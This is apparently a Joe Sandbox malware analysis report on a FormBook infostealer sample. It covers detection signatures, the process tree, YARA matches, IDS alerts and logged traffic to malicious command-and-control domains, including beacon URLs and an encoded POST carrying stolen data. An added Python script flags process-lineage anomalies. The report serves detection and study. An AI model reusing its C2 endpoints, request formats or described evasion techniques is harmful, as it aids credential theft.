Windows Analysis Report
Gd3lOevK672JYIK.zip.exe

Overview

General Information

Sample name: Gd3lOevK672JYIK.zip.exe
Analysis ID: 1608114
MD5: 8b99899d6d20e4a7922839e0152d8c6b
SHA1: 4b52e6f943db82dc9c622d7f3ffb848f467be066
SHA256: 78320f7a37d22d4c8c4c6be7c24e8cc3ae65775fdf5e4727fd2d72f5235c11bd
Tags: exe, zip, user-abuse_ch

Detection

FormBook
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Gd3lOevK672JYIK.zip.exe (PID: 3172 cmdline: "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe" MD5: 8B99899D6D20E4A7922839E0152D8C6B)
    • Gd3lOevK672JYIK.zip.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe" MD5: 8B99899D6D20E4A7922839E0152D8C6B)
    • Gd3lOevK672JYIK.zip.exe (PID: 3872 cmdline: "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe" MD5: 8B99899D6D20E4A7922839E0152D8C6B)
      • TjdgrMPwNLGImh.exe (PID: 712 cmdline: "C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\S8rq617Lx.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • net.exe (PID: 6972 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • TjdgrMPwNLGImh.exe (PID: 1588 cmdline: "C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 5552 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
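The process tree above carries three lineage signals worth detecting independently of any signature: the sample launches two further copies of its own image (the usual prelude to hollowing a suspended copy, matching the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures), net.exe, a console utility that should never have children, spawns both a second TjdgrMPwNLGImh.exe and firefox.exe, and the sample's own name ends in ".zip.exe". The following is an added example, not part of the Joe Sandbox report, that rebuilds the tree from process-creation records and reports those three conditions; the record format (pid, ppid, image path) is an assumption, the records themselves are constructed from the PIDs and command-line paths listed above, and the utility and decoy-extension lists are assumptions chosen for illustration.

```python
"""Rebuild the process tree from process-creation records and flag the lineage
anomalies visible in this report: the sample re-launching its own image, a
console utility (net.exe) acting as a parent, and a double-extension file name.
Added example, not part of the Joe Sandbox report. The record format (pid,
ppid, image path) is an assumption; Sysmon event ID 1 or a sandbox process
list can be mapped onto it."""
from collections import defaultdict

# Constructed from the report's process tree: PIDs and command-line paths as
# listed there. The root's parent PID is unknown, so it is recorded as 0.
EVENTS = [
    {"pid": 3172, "ppid": 0,    "image": r"C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"},
    {"pid": 4952, "ppid": 3172, "image": r"C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"},
    {"pid": 3872, "ppid": 3172, "image": r"C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"},
    {"pid": 712,  "ppid": 3872, "image": r"C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\S8rq617Lx.exe"},
    {"pid": 6972, "ppid": 712,  "image": r"C:\Windows\SysWOW64\net.exe"},
    {"pid": 1588, "ppid": 6972, "image": r"C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe"},
    {"pid": 5552, "ppid": 6972, "image": r"C:\Program Files\Mozilla Firefox\Firefox.exe"},
]

# Assumption: console utilities that have no business spawning other programs;
# a child under one of them means the parent has been hijacked.
LEAF_UTILITIES = {"net.exe", "net1.exe", "nslookup.exe", "ipconfig.exe"}
# Assumption: inner extensions that make "<name>.<ext>.exe" a disguise.
DECOY_EXTENSIONS = {"zip", "rar", "pdf", "doc", "docx", "xls", "xlsx", "jpg", "txt"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(events):
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def has_double_extension(name):
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] == "exe" and parts[-2] in DECOY_EXTENSIONS


def find_anomalies(events):
    """Return (finding, pid, detail) tuples; pid is the process the finding is about."""
    by_pid, children = build_tree(events)
    findings = []
    for pid in sorted(by_pid):
        e = by_pid[pid]
        name = basename(e["image"])
        kids = children.get(pid, [])
        if has_double_extension(name):
            findings.append(("double_extension", pid, name))
        if name in LEAF_UTILITIES and kids:
            findings.append(("utility_spawns_child", pid,
                             [basename(by_pid[k]["image"]) for k in kids]))
        for k in kids:
            # Same image launched by itself: candidate for self-injection / hollowing.
            if by_pid[k]["image"].lower() == e["image"].lower():
                findings.append(("self_respawn", pid, k))
    return findings


def lineage(events, pid):
    """Image names from the root down to pid, for an analyst-readable chain."""
    by_pid, _ = build_tree(events)
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for finding in find_anomalies(EVENTS):
        print(finding)
    print(" -> ".join(lineage(EVENTS, 5552)))
```

The lineage helper is what turns a single alert into the chain an analyst actually needs: for the firefox.exe process it yields sample -> sample -> S8rq617Lx.exe -> net.exe -> firefox.exe, which makes clear that the browser was started by an injected net.exe and not by the user.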
Memory dumps matched by YARA:

Source                                                                                  Rule                    Description             Author
00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
(4 further entries not shown)

Unpacked PE files matched by YARA:

Source                                           Rule                    Description             Author
4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack      JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack  JoeSecurity_FormBook_1  Yara detected FormBook  Joe Security
                No Sigma rule has matched
Timestamp                        SID      Severity  Classtype                      Source IP       Src port  Destination IP  Dst port  Protocol
2025-02-06T09:02:36.642486+0100  2859622  1         Exploit Kit Activity Detected  172.67.179.147  80        192.168.2.6     57313     TCP
2025-02-06T09:04:34.139507+0100  2859622  1         Exploit Kit Activity Detected  172.67.179.147  80        192.168.2.6     57312     TCP
2025-02-06T09:04:39.231885+0100  2859622  1         Exploit Kit Activity Detected  172.67.179.147  80        192.168.2.6     57314     TCP
2025-02-06T09:04:41.805416+0100  2859622  1         Exploit Kit Activity Detected  172.67.179.147  80        192.168.2.6     57316     TCP


                AV Detection

Source: http://www.physicsbrain.xyz/q4l7/ | Avira URL Cloud: Label: malware
Source: http://www.mujde.info/tzfg/ | Avira URL Cloud: Label: malware
Source: http://www.dangky88kfree.online/klay/ | Avira URL Cloud: Label: malware
Source: http://www.dangky88kfree.online/klay/?Wv-0mb=qIEKWIS3DMnk3zTmf0s4Y7Lt2Z2YMhdaLxtBWLQ8PBNEgHFsllo7qGfbjG1Gh25bF4MatMnsGEaOe/p8yLTZcfeme15SQZlhWMUbNNAfwS0puqGCT8Mf4NNIUyvk3MC3iEH+u9E=&fB=y07X1lcxALj | Avira URL Cloud: Label: malware
Source: http://www.physicsbrain.xyz/q4l7/?Wv-0mb=3zHfXB/0mptGp/kd11StXhNCa9oiA5B0cDh52wZsVjtjceHZNSwcTokLEErD8EPYf9KWE7/fq9i8xHcbweVV+K0iCv4MlqMIPoO4Duscgacd1t1t+MPl+/aeQnzsHBkXjnuiif4=&fB=y07X1lcxALj | Avira URL Cloud: Label: malware
Source: http://www.mujde.info/tzfg/?fB=y07X1lcxALj&Wv-0mb=PjLaewYoEo4VGB+R4c5HZF4EOZeUC0UQ0hh4LhwLPNFujMTFN6J3ezPBQ3TU3W12Yt5GTeUL6thjg9JW07tcY5vIr8bQUpKqb+VNrmpnqongAthMQI6diofQf29ZyKSZ0XZ2s50= | Avira URL Cloud: Label: malware
Source: Gd3lOevK672JYIK.zip.exe | Virustotal: Detection: 38%
Source: Gd3lOevK672JYIK.zip.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Gd3lOevK672JYIK.zip.exe | Joe Sandbox ML: detected
Source: Gd3lOevK672JYIK.zip.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Gd3lOevK672JYIK.zip.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: net.pdbUGP | source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Gd3lOevK672JYIK.zip.exe, Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: net.pdb | source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: TjdgrMPwNLGImh.exe, 0000000A.00000000.2563425890.000000000085F000.00000002.00000001.01000000.0000000C.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714217135.000000000085F000.00000002.00000001.01000000.0000000C.sdmp
Note: the Chrome.pdb path is read from the image of TjdgrMPwNLGImh.exe itself, in dumps taken at process start, so that executable is Joe Security's own FakeChrome decoy program present in the sandbox, not a file written by the sample; the FormBook YARA hits in that process come from the memory regions injected into it later (the .00000002 dumps), not from its image.
Source: C:\Windows\SysWOW64\net.exe | Code function 11_2_0281C680: FindFirstFileW, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\net.exe | Code function 11_2_02809E40: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\net.exe | Code function 11_2_0280E248: 4x nop then pop edi
Source: C:\Windows\SysWOW64\net.exe | Code function 11_2_02E704E8: 4x nop then mov ebx, 00000004h

                Networking

                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57316
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57314
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57312
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57313
                Source: DNS query: www.erectus.xyz
                Source: DNS query: www.iquery.xyz
                Source: DNS query: www.physicsbrain.xyz
                Source: DNS query: www.superhoroz.xyz
Source: global traffic | TCP traffic: 192.168.2.6:57139 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 192.64.118.221
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 connections)
Source: global traffic | HTTP traffic detected: GET /9kj6/?Wv-0mb=AVccbOSLL/+N4XgxWpbST2GRql+zePew8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeSRa2ctgh7q7sNexMEHtqMe57bNjGpdeQbciM2ERUCv8rawtCjHo=&fB=y07X1lcxALj HTTP/1.1 | Host: www.cloud-kuprof2.click | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /cjko/?Wv-0mb=3gJzY2hwuTATu+whP7Mcbn4uPYsAIhg05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBpdeGUzUPioxCZrmYWiqCwfNJbiKEcBQwHfIM5mtNggh01wsvlSM=&fB=y07X1lcxALj HTTP/1.1 | Host: www.erectus.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /6wg4/?Wv-0mb=e2yux1VtJoqvcqg//AuOd1cW9ptpoBLl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqss38I2AsCBb/dd+vVDhzv64ErVrlMRO2uWY5VclBwacLuBdPO4k=&fB=y07X1lcxALj HTTP/1.1 | Host: www.globalcase.website | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /wurw/?Wv-0mb=AnTV2PZB96hzeGpdox3R1euC5tJ7j9BP6MTRc/0V7XuIxOJUDZ8vHF+lgPe4wRgEiNKqti0MezvZBz/rkSMGvqLqrCXstXc3JK14B1Rwu/r+C09KpsX0ZbQOVRwa1Pnh6LUbv0I=&fB=y07X1lcxALj HTTP/1.1 | Host: www.adjokctp.icu | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /2o8m/?Wv-0mb=bm7QAD20mCnoHtbaL/8YgQ7YhFXapF90rUedqgqpBEM6BLNZ+jEX2t/OtKPUsXWFAKe8np5Co20a6f85QZVrQUSa8C/9p2HJ/w+PSu0LA/6v5Gf3dSbQTxP6bMtcP8dRDaIfQ4g=&fB=y07X1lcxALj HTTP/1.1 | Host: www.iquery.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /q4l7/?Wv-0mb=3zHfXB/0mptGp/kd11StXhNCa9oiA5B0cDh52wZsVjtjceHZNSwcTokLEErD8EPYf9KWE7/fq9i8xHcbweVV+K0iCv4MlqMIPoO4Duscgacd1t1t+MPl+/aeQnzsHBkXjnuiif4=&fB=y07X1lcxALj HTTP/1.1 | Host: www.physicsbrain.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /gyh1/?Wv-0mb=A7NsjztG1NbQPpI9ZE7lcKBsTxmGtiXMPkShtAkJJXgPiqJ6q1NZppBagIaRERqDgecHQkyweHxfC5gidOqMBIv8TuneLvGkNtr8ty+s6hiiQYO4eAf0be5bhISlMvPBeud7vN0=&fB=y07X1lcxALj HTTP/1.1 | Host: www.grcgrg.net | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /7r14/?fB=y07X1lcxALj&Wv-0mb=IoQ5FJRh4G5Ptnd6160xMDz25cCUcBa0AKfr5xy7yi7UDONnCkf5gNgCLKsRqKS7IR6ZRfHXpFlTFed3aPY1ae3orGnVU0349RymPmchXrjsGvNzD2nfbx0i7mHL3KHjMRCwiXU= HTTP/1.1 | Host: www.superhoroz.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /nh5f/?Wv-0mb=JrL/TbLCLlUUoPres93CZ7BnahiysxfIwFNLPYkkDhkuyQg5g6SEms/XeZ/xBHJgqd48M73/xhuXnH0xKRzU6Oogd517fpg0YoX/abOo12GeT+j38frxAPE3OzbludBpgjYFr8Q=&fB=y07X1lcxALj HTTP/1.1 | Host: www.tumbetgirislinki.fit | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /tzfg/?fB=y07X1lcxALj&Wv-0mb=PjLaewYoEo4VGB+R4c5HZF4EOZeUC0UQ0hh4LhwLPNFujMTFN6J3ezPBQ3TU3W12Yt5GTeUL6thjg9JW07tcY5vIr8bQUpKqb+VNrmpnqongAthMQI6diofQf29ZyKSZ0XZ2s50= HTTP/1.1 | Host: www.mujde.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /oam7/?Wv-0mb=7E/j/USbutW+G3Sfg0Ub1oeY6DmlMSofSR+gNRa1yNEzRcpy2ftaU6LsEmDL3xoGKbYrm/KCiQ74ien4mX6KXc7fB/OaINQmXV2SlvuBgh9jOcJyQ/EVFCBx7lOKcVuMEQjsU7M=&fB=y07X1lcxALj HTTP/1.1 | Host: www.domuss.asia | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /klay/?Wv-0mb=qIEKWIS3DMnk3zTmf0s4Y7Lt2Z2YMhdaLxtBWLQ8PBNEgHFsllo7qGfbjG1Gh25bF4MatMnsGEaOe/p8yLTZcfeme15SQZlhWMUbNNAfwS0puqGCT8Mf4NNIUyvk3MC3iEH+u9E=&fB=y07X1lcxALj HTTP/1.1 | Host: www.dangky88kfree.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com | equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: www.cloud-kuprof2.click
Source: global traffic | DNS traffic detected: DNS query: www.erectus.xyz
Source: global traffic | DNS traffic detected: DNS query: www.fineitemrealm.shop
Source: global traffic | DNS traffic detected: DNS query: www.globalcase.website
Source: global traffic | DNS traffic detected: DNS query: www.adjokctp.icu
Source: global traffic | DNS traffic detected: DNS query: www.iquery.xyz
Source: global traffic | DNS traffic detected: DNS query: www.physicsbrain.xyz
Source: global traffic | DNS traffic detected: DNS query: www.grcgrg.net
Source: global traffic | DNS traffic detected: DNS query: www.superhoroz.xyz
Source: global traffic | DNS traffic detected: DNS query: www.tumbetgirislinki.fit
Source: global traffic | DNS traffic detected: DNS query: www.mujde.info
Source: global traffic | DNS traffic detected: DNS query: www.domuss.asia
Source: global traffic | DNS traffic detected: DNS query: www.dangky88kfree.online
Source: global traffic | DNS traffic detected: DNS query: www.jobby.education
                Source: unknownHTTP traffic detected: POST /cjko/ HTTP/1.1Host: www.erectus.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USCache-Control: no-cacheContent-Length: 211Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.erectus.xyzReferer: http://www.erectus.xyz/cjko/User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36Data Raw: 57 76 2d 30 6d 62 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 32 4a 35 66 63 59 41 41 56 57 59 6f 50 62 67 6a 63 67 63 46 39 48 6e 6f 56 6c 6c 35 36 63 58 4e 4f 59 7a 54 46 70 65 59 66 4a 57 66 74 30 4f 4b 53 6f 38 55 41 77 59 38 41 6f 43 45 43 35 64 5a 42 4c 49 4a 31 4d 6a 77 69 2b 54 6e 54 52 38 4f 73 4f 5a 31 63 4f 6d 73 58 7a 43 4d 32 65 4e 4d 66 67 54 6d 63 6c 49 32 50 36 64 61 30 46 78 44 37 53 42 32 31 6d 6f 68 6f 45 76 73 6f 61 72 50 4d 69 66 53 43 43 73 51 4b 50 6c 68 44 2b 38 43 64 47 7a 31 31 2b 4b 72 4c 62 4b 59 58 2f 75 46 48 39 64 6b 4d 44 76 61 69 68 43 6e 49 65 76 49 74 65 4f 47 45 35 7a 68 6d 57 43 51 54 65 55 42 Data Ascii: Wv-0mb=6ihTbDU3+TJ32J5fcYAAVWYoPbgjcgcF9HnoVll56cXNOYzTFpeYfJWft0OKSo8UAwY8AoCEC5dZBLIJ1Mjwi+TnTR8OsOZ1cOmsXzCM2eNMfgTmclI2P6da0FxD7SB21mohoEvsoarPMifSCCsQKPlhD+8CdGz11+KrLbKYX/uFH9dkMDvaihCnIevIteOGE5zhmWCQTeUB
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Thu, 06 Feb 2025 08:03:39 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 